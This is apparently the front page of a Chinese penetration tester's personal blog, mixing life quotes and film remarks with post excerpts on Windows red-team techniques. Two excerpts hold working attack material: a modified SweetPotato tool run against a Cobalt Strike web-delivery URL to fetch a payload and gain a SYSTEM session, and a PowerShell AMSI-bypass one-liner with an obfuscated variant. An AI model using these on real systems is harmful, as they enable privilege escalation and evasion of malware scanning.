你可知道，你的名字解释了我的一生！！！

陌生人，欢迎来到我的博客，这里没有太多的技术干货、没有太多的心灵鸡汤，
只是我的一份自留地，你可以在这里看看我写的文章、听听我分享给你的民谣，
然后看一看、逛一逛。

前几天访问自己之前的博客（ps：网易的）发现被封了，原因未可知。四年的博客
说没就没了，心疼，虽然也没有什么，友联暂时就这些，想加的私我一下。

但愿它能多陪我几年。

如果我有的选，我能比你们所有人都好。——《何以为家》

windows单机Persistence

承诺是男人给女人的定心丸。吃了安心，虽然这定心丸的药性有待考证，但女人都希望吃了再说。

文章首发云众可信，博客备份。

当年的爱，大风萧萧的草莽之爱

记录一些LateralMovement(横向移动)的方法.本文首发　

https://www.sec-in.com/article/311

博客备份

岁月静好,浅笑安然。

最近好忙….

在漏洞银行做了一次直播课，算是了却了自己的一个心愿…

疫情原因，电影都少了，也就没写过影评….

在录制内网渗透的课程，用来沉淀自己….希望能帮助到有需要的人吧…

文章更的少，有时间就陪陪家人…

录完课程后恢复…

我觉得，当你年轻的时候，你会相信你会认识很多人，但后来你才会发现能交流的人其实很少。

朋友在群里说的，拿过来记录下..

“只有在梦想中，人才能真正自由。”

－－《死亡诗社》

首发在了t00ls

对

https://github.com/CCob/SweetPotato

进行修改，使其可以直接上线一个system的session

使用方法：

使用cs启动一个web攻击的简体

SweetPotato.exe www.xxx.com/xxx.xxx

即可获得会话

编译好的版本：

https://github.com/lengjibo/RedTeamTools/tree/master/windows/SweetPotato

欢迎各位师傅fork start

“掉在水里你不会淹死，

呆在水里你才会淹死，

你只有游，不停的往前游…”

用下面的方法就好了…

原来是这样：

1

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

稍微修改：

1

$m = "System.Management.Automation.Ams";[Ref].Assembly.GetType("$m" + "iUtils").GetField('amsiI' + 'nitFailed','NonPublic,Static').SetValue($null,$true)

“要么忙着活，要么忙着死 。 ”

首发云众可信，博客备份

“只有在梦想中，人才能真正自由。”

－－《死亡诗社》

文如题目，Windows Access Token Manipulation　Attack